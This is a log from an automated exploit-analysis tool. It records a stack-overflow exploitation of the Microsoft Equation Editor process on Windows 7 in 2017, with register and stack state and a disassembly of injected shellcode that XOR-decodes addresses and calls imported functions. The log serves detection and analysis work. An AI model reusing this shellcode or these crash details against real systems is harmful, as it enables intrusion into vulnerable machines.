+-------------------------------------------------------------------------+ | This file has been generated by The Iron-Ox Tools | | CopyLeft (c) 2010-2017/VxJump, | | by nEINEI | | Automated Exploit Analysis Tools | +-------------------------------------------------------------------------+ **************************************** 2017/12/26 07:20:35.734 Current Target Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE **************************************** OS Version :Windows Win7 Exploit Type:Stack Overflow:1 Address While In The Vulnerability Happens:0012F350 Registers While In The Vulnerability Happens: EAX:00000000,EBX:00000006,ECX:0000010D,EDX:001244B8,ESI:0012F7E4,EDI:0012F380,EBP:909010FF,ESP:0012F1D8 Current Stack Pointer:--->0x0012F1D8 Stack Information:Probably Execution Code stack[0]:0x00000000 stack[1]:0x0012F1EC stack[2]:0x0012F5E0 stack[3]:0x0012F7E4 0012F350: B8 44EB7112 MOV EAX, 1271EB44 ; 0012F355: BA 78563412 MOV EDX, 12345678 ; 0012F35A: 31D0 XOR EAX, EDX ; 0012F35C: 8B08 MOV ECX,DWORD PTR DS:[EAX] ; 0012F35E: 8B09 MOV ECX,DWORD PTR DS:[ECX] ; 0012F360: 8B09 MOV ECX,DWORD PTR DS:[ECX] ; 0012F362: 66:83C13C ADD CX, 3C ; 0012F366: 31DB XOR EBX, EBX ; 0012F368: 53 PUSH EBX ; 0012F369: 51 PUSH ECX ; 0012F36A: BE 643E7212 MOV ESI, 12723E64 ; 0012F36F: 31D6 XOR ESI, EDX ; 0012F371: FF16 CALL DWORD PTR DS:[ESI] ; 0012F373: 53 PUSH EBX ; 0012F374: 66:83EE4C SUB SI, 4C ; 0012F378: FF10 CALL DWORD PTR DS:[EAX] ; 0012F37A: 90 NOP ; 0012F37B: 90 NOP ; 0012F37C: 1421 ADC AL, 21 ; 0012F37E: 40 INC EAX ; //-------------------------------------------------------------------------------------------------------